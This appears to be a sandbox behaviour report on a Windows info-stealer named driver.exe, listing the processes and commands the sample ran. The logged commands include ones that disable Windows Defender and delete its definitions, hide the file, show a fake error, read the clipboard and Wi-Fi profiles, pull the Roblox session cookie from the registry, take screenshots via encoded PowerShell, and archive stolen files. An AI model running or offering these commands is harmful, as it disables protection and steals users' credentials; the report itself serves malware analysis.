Source: C:\Users\user\Desktop\driver.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI57082

Jump to behavior

Source: driver.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\driver.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: tasklist.exe, 0000001A.00000002.2177448251.000002081EE14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process;
Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: driver.exe, 00000002.00000003.2185261659.000001C0EF1C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: driver.exe	Virustotal: Detection: 43%
Source: driver.exe	ReversingLabs: Detection: 36%

Source: driver.exe	String found in binary or memory: set-addPolicy
Source: driver.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\driver.exe

File read: C:\Users\user\Desktop\driver.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\driver.exe "C:\Users\user\Desktop\driver.exe"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Users\user\Desktop\driver.exe "C:\Users\user\Desktop\driver.exe"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\driver.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\driver.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5CD.tmp" "c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP"
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv g+FHZVRhzUydp9rkwD8VSQ.0.2
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
